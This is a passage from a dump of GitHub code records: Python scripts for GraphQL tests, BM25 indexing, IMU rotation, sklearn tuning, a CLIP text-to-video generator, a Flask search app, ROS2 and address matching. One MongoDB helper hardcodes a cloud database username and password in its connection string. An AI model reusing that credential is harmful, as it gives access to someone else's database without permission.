{\n \"first\": 9,\n \"id\": tool_id\n }\n response = requests.post(base_url, json={\"query\": query, \"variables\": variables})\n data = response.json()['data']\n response.raise_for_status()\n assert data['tool']['allToolIntegrations']['count'] > 0\n","repo_name":"elizabethmalikova/stackshare_graphql_tests","sub_path":"graphql_tests/unauth_tests/test_allToolIntegrations.py","file_name":"test_allToolIntegrations.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23959035003","text":"# ARGUMENTS : Filename of the stemmed corpus\n# RETURNS : A tuple containing InvertedIndex, List of unique docs and Dict of document length\n\ndef invertedIndex(fileName):\n\tf = open(fileName, 'r')\n\tindex = {}\n\tdocTokens = []\n\tdocID = 0\n\tdocList = []\n\tdocLength = {}\n\tfor line in f:\n\t\tif line != '\\n':\n\t\t\tif line[0] == '#':\t\t\t\t\t\t\t\t\t\t\t\t# Break which indicates new document\n\t\t\t\tif len(docTokens) == 0:\n\t\t\t\t\tdocTokens = []\n\t\t\t\t\tdocID = int(line[1:])\n\t\t\t\t\tdocList.append(docID)\n\t\t\t\telse:\n\t\t\t\t\tindex = addToIndex(docTokens, docID, index)\n\t\t\t\t\tdocLength[docID] = len(docTokens)\n\t\t\t\t\tdocTokens = []\n\t\t\t\t\tdocID = int(line[1:])\n\t\t\t\t\tdocList.append(docID)\n\t\t\telse:\n\t\t\t\ttokens = line.split(' ')\n\t\t\t\ttokens[-1] = tokens[-1].split('\\n').pop(0)\n\t\t\t\ttokens = [token for token in tokens if not token.isdigit()] # Ignores all number only tokens \n\t\t\t\tdocTokens = docTokens + tokens\n\n\n\tindex = addToIndex(docTokens, docID, index)\n\tdocList.append(docID)\n\tdocLength[docID] = len(docTokens)\n\treturn (index, list(set(docList)), docLength) \t\t\t\t\t\t\t# Final tuple that is returned\n\n\n\n# ARGUMENTS : List of tokens in a document\n# RETURNS : Frequency of each term in the document as a Dictionary\ndef termFrequency(tokens):\n\tdistinctTokens = list(set(tokens))\n\tfreqDict = {}\n\tfor token in distinctTokens:\n\t\tfreqDict[token] = tokens.count(token)\n\n\treturn freqDict\n\n\n# ARGUMENTS : Tokens in a doc, Document ID, InvertedIndex\n# RETURNS : An updated inverted index with the doc ID and term frequency\ndef addToIndex(docTokens, docID, index):\n\tfreqDict = termFrequency(docTokens)\n\tfor token in list(set(docTokens)):\n\t\tif token in index:\n\t\t\tindex[token].append((docID, freqDict[token]))\n\t\telse:\n\t\t\tindex[token] = []\n\t\t\tindex[token].append((docID, freqDict[token]))\n\treturn index\n\n\n\n# print invertedIndex('tokens.txt')","repo_name":"kdin/BM25-Ranking","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11056592489","text":"import time\nimport board\nimport adafruit_bno055\nimport numpy as np\n\n\ni2c = board.I2C()\nsensor = adafruit_bno055.BNO055_I2C(i2c)\n\nlast_val = 0xFFFF\nprevR = np.eye(3)\n\ndef rotationMatrix():\n global prevR\n eAngles = sensor.euler\n Rx = np.array([[1, 0, 0],\n [0, np.cos(eAngles[0]), -1*np.sin(eAngles[0])],\n [0, np.sin(eAngles[0]), np.cos(eAngles[0])]])\n Ry = -1*np.array([[np.cos(eAngles[2]), 0, np.sin(eAngles[2])],\n [0, 1, 0],\n [-1*np.sin(eAngles[2]), 0, np.cos(eAngles[2])]])\n Rz = np.array([[np.cos(eAngles[1]), -1*np.sin(eAngles[1]), 0],\n [np.sin(eAngles[1]), np.cos(eAngles[1]), 0],\n [0, 0, 1]])\n R = np.dot(Rz, np.dot(Ry, Rx))\n R_t = np.transpose(R)\n Rdelta = np.dot(R_t, prevR)\n prevR = R\n return Rdelta\n\nif __name__ == \"__main__\":\n while True:\n \tprint(\"Euler angles: {}\".format(sensor.euler))\n \tprint(\"Rotation matrix: \\n\\r{}\".format(rotationMatrix()))\n \ttime.sleep(1)\n","repo_name":"pianoman373/scrying-stone-software","sub_path":"IMU_rotation.py","file_name":"IMU_rotation.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26466066440","text":"import pandas as pd\r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\ndigits = datasets.load_digits()\r\n\r\nmodel_parameters = {\r\n 'svm': {\r\n 'model': svm.SVC(gamma='auto'),\r\n 'parameters' : {\r\n 'C': [1,10,20],\r\n 'kernel': ['rbf','linear']\r\n } \r\n },\r\n 'random_forest': {\r\n 'model': RandomForestClassifier(),\r\n 'parameters' : {\r\n 'n_estimators': [1,5,10]\r\n }\r\n },\r\n 'logistic_regression' : {\r\n 'model': LogisticRegression(solver='liblinear',multi_class='auto'),\r\n 'parameters': {\r\n 'C': [1,5,10]\r\n }\r\n },\r\n 'naive_bayes_gaussian': {\r\n 'model': GaussianNB(),\r\n 'parameters': {}\r\n },\r\n 'naive_bayes_multinomial': {\r\n 'model': MultinomialNB(),\r\n 'parameters': {}\r\n },\r\n 'decision_tree': {\r\n 'model': DecisionTreeClassifier(),\r\n 'parameters': {\r\n 'criterion': ['gini','entropy'],\r\n \r\n }\r\n } \r\n}\r\n\r\nscores = []\r\nfor model_name, model_parameter in model_parameters.items():\r\n clf = GridSearchCV(model_parameter['model'], model_parameter['parameters'], cv=5, return_train_score=False)\r\n clf.fit(digits.data, digits.target)\r\n scores.append({\r\n 'model': model_name,\r\n 'best_score': clf.best_score_,\r\n 'best_params': clf.best_params_\r\n })\r\n \r\ndf = pd.DataFrame(scores,columns=['model','best_score','best_params'])\r\n","repo_name":"nkhalil98/machine-learning","sub_path":"Hyper Parameter Tuning/hyper_paramerter_tuning.py","file_name":"hyper_paramerter_tuning.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73538041107","text":"# Создайте класс Сотрудник.\n# # 📌 Воспользуйтесь классом человека из прошлого задания.\n# # 📌 У сотрудника должен быть:\n# # ○ шестизначный и��ентификационный номер\n# # ○ уровень доступа вычисляемый как остаток от деления\n# # суммы цифр id на семь\n\nfrom task_3 import Person\n\n\nclass Employee(Person):\n MAX_LEVEL = 7\n\n def __init__(self, name: str, surname: str, patronymic: str, age: int, id: int):\n super().__init__(name, surname, patronymic, age)\n if 100_000 <= id < 1_000_000:\n self.id = id\n else:\n self.id = 100_000\n\n def get_level(self):\n sum_num = sum(int(num) for num in str(self.id))\n return sum_num % self.MAX_LEVEL\n\n\n# vasya_2 = Person('Vasya', 'Pupkin', 'Andreevich', 24)\n\n\nnew_employee = Employee('Vasya', 'Pupkin', 'Andreevich', 24, 102_342)\nprint(new_employee.full_name())\nprint(new_employee.get_level())","repo_name":"ValeryBurlakov/python_based","sub_path":"seminars/seminar_10/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21240415952","text":"#this program will implement a game called Ricerca Binaria\n\n\n#this function is just a welcome page to the program\ndef welcomepage():\n print(\"\"\"Greatings human.\nI am going to pick a number between 17 and 666, inclusive.\nIt is up to you to figure out what number I have chosen.\"\"\")\n \n#this function will generate a random number between 1 and 100\nimport random\ndef randomnum():\n randnum = random.randrange(17, 666+1)\n return randnum\n\n#this function will prompt the user to guess the generated number\ndef guessgame(num):\n print (\"I have picked a number, and you have 17 guesses... good luck guessing...\")\n guess = 0\n i = 1\n while guess != num and i < 18:\n if i == 17:\n print(\"This is your last guess.\")\n guess = int(input(\"Enter guess #\" + str(i) + \": \"))\n i += 1\n if guess > num:\n print(\"Too high, human.\")\n elif guess < num:\n print(\"Too low, human.\")\n elif guess == num:\n print (\"Congratulations, you guessed correctly!\")\n print (\"I guess I'll spare your life.\")\n if i == 18:\n print (\"You are now going to die now, sorry.\")\n \ndef main():\n welcomepage()\n startup = input(\"Are you ready? y or n: \")\n if startup == \"y\":\n print(\"Wise choice.\")\n guessgame(randomnum())\n if startup == \"n\":\n print(\"Too bad.\")\n guessgame(randomnum())\nmain()\n \n \n","repo_name":"cyberLaVoy/coursework","sub_path":"py-games/misc/ricerca-binaria.py","file_name":"ricerca-binaria.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45229174212","text":"import torch\nimport numpy as np\nimport datetime\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\n\nfrom utils import *\nfrom clip_loss import *\n\nfrom beautifier import cyclegan_model\n\ndef load_generator_model(model_type, n=1, ngf=64, h=None, w=None, pretrained_model=None):\n\n generate = lambda g, z : g(z)\n\n if model_type == 'cyclegan':\n z = torch.rand((n, 3, h, w), device=device)\n gen = cyclegan_model.netG_A\n generate = lambda g, z : (g(z)+ 1)/2\n else:\n class Nothin(nn.Module):\n def __init__(self):\n super(Nothin, self).__init__()\n def forward(self, z):\n return z\n gen = Nothin()\n z = torch.rand((n, 3, h, w), device=device)\n generate = lambda g, z : g(z)\n\n # for param in gen.parameters():\n # param.requires_grad = True\n # gen.train()\n\n z.requires_grad = True\n\n for param in gen.parameters():\n param.requires_grad = False\n gen.eval()\n\n return gen, z, generate\n\n\n# Image Augmentation Transformation\naugment_trans, augment_trans_style, augment_change_clip = get_image_augmentation(True)\n\ndef alter_z_noise(z, squish=4, noise_std=1.):\n # Alter the params so the next image isn't exactly like the previous.\n with torch.no_grad():\n # z /= squish\n # #z += torch.rand(z.shape).to(device) * noise_std\n # noise = torch.rand(z.shape).to(device)#.clamp(-.2,.5)\n # z += noise * noise_std\n z /= squish\n z += torch.randn(z.shape).to(device) * noise_std\n return z\n\ndef generate_video( prompts, # List of text prompts to use to generate media\n h=9*40,w=16*40,\n lr=.1,\n num_augs=4,\n model_type='cyclegan',\n debug=True,\n frames_per_prompt=10, # Number of frames to dedicate to each prompt\n first_iter=300, # Number of optimization iterations for first first frame\n num_iter=50, # Optimization iterations for all but first frame\n z_unchanging_weight=3, # Weight to ensure z does not change at all * l1_loss(z, z_prev)\n z_noise_squish=4., # Amount to squish z by between frames\n carry_over_iter=17, # Which iteration of optimization to use as the start of the next frame\n encoding_comparison='cosine', # or \"emd\"\n n_samples=1):\n\n start_time, all_canvases = time(), []\n all_latents = []\n\n gen, z_for_next_frame, generate = load_generator_model(model_type, n=n_samples, ngf=666, h=h, w=w, pretrained_model=None)\n\n # Optimizers\n #optim, style_optim, z_optim = torch.optim.Adam([z], lr=lr), torch.optim.RMSprop([z], lr=lr), torch.optim.Adam([z], lr=lr)\n\n content_loss, z_loss, styleloss_tot = 0, 0, 0\n prev_z = None\n image_features, image_features_16 = None, None\n total_chunks = (len(prompts)-1) * 2*frames_per_prompt + frames_per_prompt\n pbar = tqdm(total=total_chunks)\n\n cosine_dist = lambda a, b: -1 * torch.cosine_similarity(a, b, dim=1)\n encoding_compare = cosine_dist if encoding_comparison == 'cosine' else EMD\n l1_loss = nn.L1Loss()\n\n for prompt_ind in range(len(prompts)):\n prompt_now = prompts[prompt_ind]\n prompt_next = prompts[prompt_ind+1] if prompt_ind < len(prompts)-1 else None\n\n with torch.no_grad():\n text_features_now = model.encode_text(clip.tokenize(prompt_now).to(device))\n text_features_next = model.encode_text(clip.tokenize(prompt_next).to(device)) if prompt_next is not None else None\n text_features_now_16 = model_16.encode_text(clip.tokenize(prompt_now).to(device))\n text_features_next_16 = model_16.encode_text(clip.tokenize(prompt_next).to(device)) if prompt_next is not None else None\n\n tot_frames = frames_per_prompt*2 if prompt_ind < len(prompts)-1 else frames_per_prompt\n for frame in range(tot_frames):\n # Assign a weight to the current and next prompts\n weight_now = 1 - (frame/(tot_frames))\n weight_next = frame/(tot_frames)\n if prompt_ind == (len(prompts) - 1): weight_now = 1.\n\n # Alter the params so the next image isn't exactly like the previous.\n z = alter_z_noise(z_for_next_frame, squish=z_noise_squish, noise_std=1.)\n z.requires_grad = True\n\n # Optimizers\n optim, style_optim, z_optim = torch.optim.Adam([z], lr=lr), torch.optim.RMSprop([z], lr=lr), torch.optim.Adam([z], lr=lr)\n\n # Save features from previous frame\n prev_image_features = image_features.detach() if image_features is not None else None\n prev_image_features_16 = image_features_16.detach() if image_features_16 is not None else None\n\n # Run the main optimization loop\n iterations = first_iter if (prompt_ind==0 and frame==0) else num_iter\n for t in range(iterations):\n\n ''' Loss that goes through cyclegan '''\n # if t > (0.75*iterations):\n # optim.zero_grad()\n # z_optim.zero_grad()\n # loss = 0\n\n # # Full Sentence Loss\n # im_batch = torch.cat([augment_trans(generate(gen, z)) for n in range(num_augs)])\n # image_features = model.encode_image(im_batch)\n # image_features_16 = model_16.encode_image(im_batch)\n # for n in range(num_augs):\n # loss -= torch.cosine_similarity(text_features_now, image_features[n:n+1], dim=1) * weight_now\n # # if text_features_prev is not None: loss -= torch.cosine_similarity(text_features_prev, image_features[n:n+1], dim=1)\n # #if text_features_next is not None: loss -= torch.cosine_similarity(text_features_next, image_features[n:n+1], dim=1) * weight_next\n\n # loss -= torch.cosine_similarity(text_features_now_16, image_features_16[n:n+1], dim=1) * weight_now\n # #if text_features_next_16 is not None: loss -= torch.cosine_similarity(text_features_next_16, image_features_16[n:n+1], dim=1) * weight_next\n\n # content_loss = loss.item()\n # loss.backward()\n # optim.step()\n\n ''' Loss that just operates on z '''\n ex_freq = 2 # Alternate between two clip models for robustness\n z_optim.zero_grad()\n loss = 0\n im_batch = torch.cat([augment_trans(z) for n in range(num_augs)])\n if t % ex_freq == 0:\n image_features_16 = model_16.encode_image(im_batch)\n else:\n image_features = model.encode_image(im_batch)\n for n in range(num_augs):\n # loss for clip features of z and text features (This and next prompt)\n if t % ex_freq == 0:\n loss += encoding_compare(text_features_now_16, image_features_16[n:n+1]) * weight_now\n if text_features_next_16 is not None: loss += encoding_compare(text_features_next_16, image_features_16[n:n+1]) * weight_next\n else:\n loss += encoding_compare(text_features_now, image_features[n:n+1]) * weight_now\n if text_features_next is not None: loss += encoding_compare(text_features_next, image_features[n:n+1]) * weight_next\n\n if prev_image_features is not None:\n # Loss to make sure that z doesn't change much\n if t % 4 == 0:\n loss += l1_loss(z, prev_z) * z_unchanging_weight\n\n loss.backward()\n z_loss = loss.item()\n z_optim.step()\n # z.data.clamp_(0,1)\n\n if t == carry_over_iter-1:\n z_for_next_frame = z.detach().clone()\n\n # if t % 10 == 0 and debug:\n # print(prompt_now)\n # # print('LR', optim.param_groups[0]['lr'], '\\tZL{:.3f}'.format(z_loss), '\\tCL{:.3f}'.format(content_loss),\n # # '\\tSL{:.3f}'.format(styleloss_tot), '\\t{:.3f}min.'.format((time()-start_time)/60))\n # gen.eval()\n # for i in range(len(z)):\n # with torch.no_grad():\n # z_norm = z.detach().clone()#.clamp(0,1)\n # img = generate(gen, z_norm).detach().cpu().numpy()[i]\n # show_img(img)\n # img = z_norm.detach().cpu().numpy()[i]\n # show_img(img)\n\n prev_z = z.detach().clone()\n pbar.update(1)\n gen.eval()\n\n with torch.no_grad():\n if model_type=='cyclegan':\n z_norm = z.detach().clone()#*2 - 1#.clamp(0,1)\n # z_norm = transforms.Resize((2*h, 2*w))(z_norm) # Double the size. Hurts quality, slightly\n img = generate(gen, z_norm).detach().cpu().numpy()[0]\n # show_img(z.detach().cpu().numpy()[0])\n else:\n img = generate(gen, z).detach().cpu().numpy()[0]\n img = draw_text_on_image(img, prompt_now)\n all_canvases.append(img)\n all_latents.append(z.detach().cpu().numpy()[0])\n # if frame % 4 == 0: print('Frame: ', frame), show_img(img)\n\n # to_gif(all_canvases, fn='/animation.gif')\n # from IPython.display import Image, display\n # ipython_img = Image(open('/animation.gif','rb').read())\n # display(ipython_img)\n\n # to_gif(all_canvases, fn='/content/drive/MyDrive/animations/{}.gif'.format(time()))\n if not os.path.exists('output'): os.mkdir('output')\n\n run_name = datetime.now().strftime(\"%m_%d__%H_%M_%S\")\n fn = os.path.join('output','{}.mp4'.format(run_name))\n to_video(all_canvases, frame_rate=8, fn=fn)\n # to_video(all_canvases, frame_rate=8)\n return all_canvases, all_latents\n\n#@title generate_video_wrapper\ndef generate_video_wrapper(prompts, frames_per_prompt=10, style_opt_iter=0, temperature=50, fast=False):\n lr = .17 if fast else .1\n num_iter = 10 if fast else 25\n carry_over_iter = 9 if fast else 13\n temperature = 0.5 * temperature if fast else temperature\n\n z_unchanging_weight = 4 - (temperature/100) * 4\n z_noise_squish = (temperature/100) * 4 + 2\n\n all_canvases, fn = generate_video( prompts, # List of text prompts to use to generate media\n # h=h,w=w,\n lr=lr,\n num_augs=4,\n debug=False,\n frames_per_prompt=frames_per_prompt, # Number of frames to dedicate to each prompt\n first_iter=50, # Number of optimization iterations for first first frame\n num_iter=num_iter, # Optimization iterations for all but first frame\n carry_over_iter=carry_over_iter,\n z_unchanging_weight=z_unchanging_weight, # Weight to ensure z does not change at all * l1_loss(z, z_prev)\n z_noise_squish=z_noise_squish, # Amount to squish z by between frames\n n_samples=1)\n return all_canvases\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(\n description='Paint each frame of a video, and generate instruction files needed for robot painter.')\n\n # parser.add_argument(\"file\", type=str, help='Path of the video or image to paint.')\n parser.add_argument('--prompts', nargs='+', type=str, help='')\n parser.add_argument('--temperature', type=float, default=30)\n parser.add_argument('--slow', action=\"store_true\")\n\n args = parser.parse_args()\n\n all_canvases = generate_video_wrapper(args.prompts, frames_per_prompt=20,\n temperature=args.temperature, fast=not args.slow)","repo_name":"pschaldenbrand/Text2Video","sub_path":"text2video.py","file_name":"text2video.py","file_ext":"py","file_size_in_byte":12077,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"34888908360","text":"from pymongo import MongoClient\nfrom urllib import parse\n\n\n# connect to mongodb cloud and return the collection\ndef mongoConnect(name=\"Today\"):\n client = MongoClient(\"mongodb+srv://scarydonut:\" + parse.quote(\"YM7ZWNU5@mlab\") +\n \"@cluster0-o1llq.mongodb.net/test?retryWrites=true&w=majority\")\n db = client.Twenty20 \n collection = db[name]\n return collection \n","repo_name":"Rahul0598/Web-Articles","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14761437966","text":"from flask import Flask, render_template, request\nimport json\nimport operator\nfrom collections import defaultdict, Counter\n\napp = Flask(__name__)\nwith open(\"Query_Data/relations.json\", \"r\") as f:\n relations = json.load(f)\nwith open(\"Query_Data/text_mapping.json\", \"r\") as f:\n mappings = json.load(f)\nwith open(\"Query_Data/trigram_mappings.json\", \"r\") as f:\n tri_mappings_l = json.load(f)\n\ntrigram_mappings = {}\nfor k, v in tri_mappings_l.items():\n trigram_mappings[k] = set(v)\n\ndel tri_mappings_l\n\n\n\n\n@app.route('/')\ndef home():\n return render_template('search.html')\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search_request():\n search_term = request.form[\"input\"]\n if search_term.lower().strip() in mappings:\n uid = mappings[search_term.lower().strip()][0]\n old = relations[uid]\n res = old.copy()\n res[\"Old Query\"] = search_term\n else:\n new_query = get_similar(search_term.lower().strip())\n if new_query == \"\":\n uid = None\n res = {\"Number of Mentions\":0, \"Old Query\":search_term}\n else:\n uid = mappings[new_query.lower().strip()][0]\n old = relations[uid]\n res = old.copy()\n res[\"Old Query\"] = search_term\n res[\"New Query\"] = new_query\n\n return render_template('results.html', res=res)\n\n\ndef gjc(word, query):\n w3 = Counter([word[i:i+3] for i in range(len(word)-2)])\n q3 = Counter([query[i:i+3] for i in range(len(query)-2)])\n p = 0\n pd = 0\n for key in set(w3.keys()).union(q3.keys()):\n p += min(w3[key], q3[key])\n pd += max(w3[key], q3[key])\n \n if pd==0:\n return 0\n else:\n return p/pd\n\ndef get_similar(query):\n words = set()\n for g in [query[i:i+3] for i in range(len(query)-2)]:\n if g in trigram_mappings:\n words.update(trigram_mappings[g])\n\n if len(words)==0:\n return \"\"\n \n \n best_score = 0\n best_val = \"\"\n for word in words:\n sc = gjc(word, query)\n if sc>best_score:\n best_score = sc\n best_val = word\n return best_val\n\n\n\n\nif __name__ == '__main__':\n app.jinja_env.auto_reload = True\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n\n app.secret_key = 'mysecret'\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"boun-tabi/vapur","sub_path":"Demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"16930637893","text":"import statistics\n\nfrom orca_msgs.msg import Barometer\nimport rclpy\nfrom rclpy.node import Node\nimport rclpy.time\n\n# How many messages (measurements) to sample?\n# Run `ros2 bag info my_bag` to count messages in a ROS2 bag\nNUM_MEASUREMENTS = 2200\nTOPIC = '/filtered_barometer'\n\n\nclass CalcVarNode(Node):\n\n def __init__(self):\n super().__init__('calculate_variance')\n self._control_sub = self.create_subscription(Barometer, TOPIC, self.callback, 10)\n self._measurements = []\n self.get_logger().info(\n 'calc_var listening for {} messages on {}'.format(NUM_MEASUREMENTS, TOPIC))\n\n def callback(self, msg: Barometer):\n if len(self._measurements) == 0:\n self.get_logger().info('first message')\n\n self._measurements.append(msg.pressure)\n\n if 0 < NUM_MEASUREMENTS <= len(self._measurements):\n mean = statistics.mean(self._measurements)\n variance = statistics.variance(self._measurements, mean)\n self.get_logger().info('n: {}, mean: {}, variance: {}'.format(\n len(self._measurements), mean, variance))\n exit()\n\n\ndef main():\n rclpy.init()\n node = CalcVarNode()\n\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n node.get_logger().info('ctrl-C detected, shutting down')\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clydemcqueen/orca2","sub_path":"orca_base/scripts/calc_var.py","file_name":"calc_var.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"28714059084","text":"import glob\nfrom csv import DictReader\nimport re\nimport os\nimport csv\n\n\n# increasing tolerance will increase matches but decrease match quality\ntolerance = 3\n# verbose will display match details\nverbose = True\n\n# 1/8 = 4131598.5\n# 1/4 = 8263197\n# 1/2 = 16526393\n# Load up to limit records in the csv\n# To load all records, set the number to max int / very lage value\nlimit = 4131599\n\n# WARNING worker.py:1047 -- Warning: The remote function __main__.find_matches_parallel has size 86233916 when pickled. It will be stored in Redis, which could cause memory issues. This may mean that its definition uses a large array or other object.\n\n\n\n# src: https://stackoverflow.com/questions/33975696/find-and-replace-multiple-comma-space-instances-in-a-string-python\npattern = re.compile(r'(,\\s){2,}')\n\n# specifies the exact location the results are stored (output csv)\noutput_path = 'out/link.csv'\n\n# the output headers\n# For example, in this example the output csv will have the headings:\n# UPRN | LMK_KEY | ...\n# These should be the unique ID attribute name from each dataset\noutput_matching_ids = ['UPRN', 'LMK_KEY']\n\n\n# helper class storing an address and an identifier\n# depending on the dataset the address came from e.g - UPRN num\n# These objects are appneded to a list during the dataset parsing procedure\nclass parsed_address:\n def __init__(self, addr, id):\n self.addr = addr\n self.id = id\n\n\n# Parse the first dataset\n# Expected Output:\n# list of parsed_address objects\ndef parse_dataset_1():\n # example code below ... Add your own parsing code if required\n count = 0\n sa1_l = []\n print(\"**Parsing AddressBaseCore_FULL_2020-07-20_001.csv**\", flush=True)\n\n with open(r'C:/Users/rish/Downloads/Files_For_James/AddressBaseCore/AddressBaseCore_FULL_2020-07-20_001.csv', 'r', encoding=\"utf8\") as read_obj:\n csv_dict_reader = DictReader(read_obj)\n for row in csv_dict_reader:\n if count == limit:\n break\n count += 1\n\n address = (row['ORGANISATION'] + \",\" + row['SUB_BUILDING'] + \",\" +\n row['BUILDING_NAME'] + \",\" + row['BUILDING_NUMBER'] + \",\" +\n row['STREET_NAME'] + \",\" + row['LOCALITY'] + \",\" +\n row['TOWN_NAME'] + \",\" + row['POST_TOWN'] + \",\" +\n row['ISLAND'] + \",\" + row['POSTCODE'] + \",\")\n # clean up the address removing extra commas ,\n address = (re.sub(pattern, ', ', address).lstrip(',')).rstrip(',')\n sa1_l.append(parsed_address(address, row['\\ufeffUPRN']))\n # print(address)\n return sa1_l\n\n\n# Parse the first dataset\n# Expected Output:\n# list of parsed_address objects\ndef parse_dataset_2():\n # example code below ... Add your own parsing code if required\n\n\n count = 0\n # parse the 2nd dataset\n sa2_l = []\n # iterate through all the directories to get all domestic csvs\n # src: https://stackoverflow.com/questions/2212643/python-recursive-folder-read\n # recursively go through every file from the base director root_dir\n # if the file is a csv file and is not recommendation then add it to\n # domestic_certs_paths\n root_dir = \"C:/Users/rish/Downloads/Files_For_James/non-domestic/all-non-domestic-certificates\"\n non_domestic_certs_paths = []\n for filename in glob.iglob(root_dir + '**/**', recursive=True):\n if((\"recommendations\" not in filename) and (filename.endswith(\"certificates.csv\"))):\n non_domestic_certs_paths.append(filename)\n print(\"**Parsing\", filename.rsplit(\"\\\\\", 2)[-2], \"csv **\", flush=True)\n\n # parse every csv pointed to in the list domedomestic_certs_paths\n for csv_file in non_domestic_certs_paths:\n with open(csv_file, 'r', encoding=\"utf8\") as read_obj:\n csv_dict_reader = DictReader(read_obj)\n for row in csv_dict_reader:\n if count == limit:\n break\n count += 1\n address = (row['ADDRESS1'] + \",\" + row['ADDRESS2'] + \",\" +\n row['ADDRESS3'] + \",\" + row['POSTCODE'] + \",\")\n # clean up the address removing extra commas ,\n address = (re.sub(pattern, ', ', address).lstrip(',')).rstrip(',')\n sa2_l.append(parsed_address(address, row['LMK_KEY']))\n # print(address)\n return sa2_l\n\n\n# sets up the output CSV\ndef setup_output_csv():\n # setup the output csv\n # check if the output csv already exists\n if os.path.exists(output_path):\n # then delete the file\n os.remove(output_path)\n # now create a new output csv\n open(output_path, 'w')\n # setup the csv headers\n with open(output_path, 'a') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',',\n quotechar=\"|\", quoting=csv.QUOTE_MINIMAL)\n filewriter.writerow([output_matching_ids[0], output_matching_ids[1], 'Address 1', 'Address 2', 'Tier'])\n","repo_name":"arunptl100/address-matching","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"73151265747","text":"\nfrom __init__ import get_new_experiment_folder, individual_train_path, individual_dev_path, individual_labels_path, time_series_data_path, logs_folder, vectorizer_path, pictures_folder\nfrom scipy import sparse\nfrom sklearn.svm import SVR, SVC\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, StackingClassifier, StackingRegressor\nfrom sklearn.metrics import accuracy_score, f1_score, mean_absolute_error\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pdb\nimport pickle\nimport os\n\ndef save_sk_model(model):\n model_name = str(model).split('(')[0]\n experiment_folder = get_new_experiment_folder(model_name)\n model_path = os.path.join(experiment_folder, \"best.pkl\")\n with open(model_path, 'wb') as fout:\n pickle.dump(model, fout)\n\ndef train_test_a_model(mode, train_texts_vec, train_labels, dev_texts_vec, dev_labels):\n if mode == \"regression\":\n train_labels = np.array(train_labels).astype(np.float32)\n dev_labels = np.array(dev_labels).astype(np.float32)\n\n model = SVR(kernel='linear', verbose=10)\n\n metric_name = 'MAE'\n metric = mean_absolute_error\n else:\n model = SVC(kernel='linear', verbose=10)\n\n metric_name = 'f1_score'\n metric = lambda *args: f1_score(*args, average='weighted')\n \n model.fit(train_texts_vec, train_labels)\n pred_labels = model.predict(dev_texts_vec)\n metric_result = metric(dev_labels, pred_labels)\n print(f\"Model finished with {metric_name}: {metric_result}\")\n\n save_sk_model(model)\n\ndef train_individual(mode):\n train_texts_vec = sparse.load_npz(individual_train_path)\n dev_texts_vec = sparse.load_npz(individual_dev_path)\n train_labels, dev_labels = np.load(individual_labels_path, allow_pickle=True)\n\n train_test_a_model(mode, train_texts_vec, train_labels, dev_texts_vec, dev_labels)\n\ndef train_time_series(mode):\n train_text, dev_text, train_labels, dev_labels = np.load(time_series_data_path, allow_pickle=True)\n train_test_a_model(mode, train_text, train_labels, dev_text, dev_labels)\n\ndef plot_binary_classification_importance(label, word_names, features_importance, indices_):\n plt.figure(figsize=(20 * len(indices_) / 10, 7))\n plt.bar(word_names[indices_], features_importance[indices_])\n plt.title(f\"{label.title()} Orientation\")\n \n figure_path = os.path.join(pictures_folder, f\"{label}_keywords.png\")\n plt.savefig(figure_path)\n\ndef plot_svm_binary_classification_viz(vectorizer, model, topk=50):\n word_names = vectorizer.get_feature_names()\n word_names = np.array(word_names)\n \n features_importance = model.coef_.toarray()[0]\n sorted_indices = np.argsort(features_importance)\n\n worst_indices = sorted_indices[:topk]\n best_indices = sorted_indices[-topk:]\n\n plot_binary_classification_importance('negative', word_names, features_importance, worst_indices)\n plot_binary_classification_importance('positive', word_names, features_importance, best_indices)\n\ndef plot_feature_importance():\n exp_dir = os.path.join(logs_folder, 'SVC_0')\n model_path = os.path.join(exp_dir, 'best.pkl')\n with open(model_path, 'rb') as fin:\n model = 